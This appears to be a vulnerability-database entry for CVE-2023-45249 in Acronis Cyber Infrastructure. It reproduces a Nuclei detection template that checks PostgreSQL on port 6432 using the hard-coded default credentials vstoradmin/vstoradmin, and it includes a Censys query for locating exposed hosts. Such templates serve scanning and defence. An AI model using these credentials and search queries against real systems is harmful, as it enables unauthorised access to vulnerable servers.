CVE-2023-45249: Acronis Cyber Infrastructure - Default Password

日期: 2025-08-01 | 影响软件: Acronis Cyber Infrastructure | POC: 已公开

漏洞描述

Acronis Cyber Infrastructure (ACI) before build 5.0.1-61, 5.1.1-71, 5.2.1-69, 5.3.1-53, and 5.4.4-132 contain a remote command execution caused by use of default passwords, letting attackers execute arbitrary commands remotely, exploit requires access to the system with default credentials.

PoC代码[已公开]

id: CVE-2023-45249

info:
  name: Acronis Cyber Infrastructure - Default Password
  author: darses
  severity: critical
  description: |
    Acronis Cyber Infrastructure (ACI) before build 5.0.1-61, 5.1.1-71, 5.2.1-69, 5.3.1-53, and 5.4.4-132 contain a remote command execution caused by use of default passwords, letting attackers execute arbitrary commands remotely, exploit requires access to the system with default credentials.
  impact: |
    Attackers can execute arbitrary commands remotely, potentially leading to full system compromise.
  remediation: |
    Change default passwords and update to the latest version.
  reference:
    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
    - https://security-advisory.acronis.com/advisories/SEC-6452
    - https://security-advisory.acronis.com/updates/UPD-2310-9e7e-bd9b
    - https://www.securityweek.com/acronis-product-vulnerability-exploited-in-the-wild/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-45249
    cwe-id: CWE-1393,CWE-287
    epss-score: 0.93019
    epss-percentile: 0.9977
    cpe: cpe:2.3:a:acronis:cyber_infrastructure:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: acronis
    product: cyber_infrastructure
    censys-query: services.http.response.html_title:"Acronis Cyber Infrastructure" and services.port:6432
    max-requests: 1
  tags: cve,cve2025,kev,acronis,network,js,postgresql,default-login,vkev

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);

    code: |
      const postgres = require('nuclei/postgres');
      const client = new postgres.PGClient;
      connected =  client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT release_notes_url FROM software_info");
      Export(connected);

    args:
      Host: "{{Host}}"
      Port: 6432

      User: "vstoradmin"
      Pass: "vstoradmin"
      Db: "vstoradmin"

    matchers:
      - type: dsl
        dsl:
          - "success == true"
          - "contains_all(response, 'release_notes_url','http://download.acronis.com/vstorage/')"
        condition: and
# digest: 4a0a00473045022100da9fd54e2c17a349b1032b7a7497ee3f26d4bb4c518c70c8eb36150d9e520ab002203c3df588e15f9e04988263cf6a01cbd5b4aa8c8f3306072fe32e4284b38626cc:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/javascript/cves/2025/CVE-2023-45249.yaml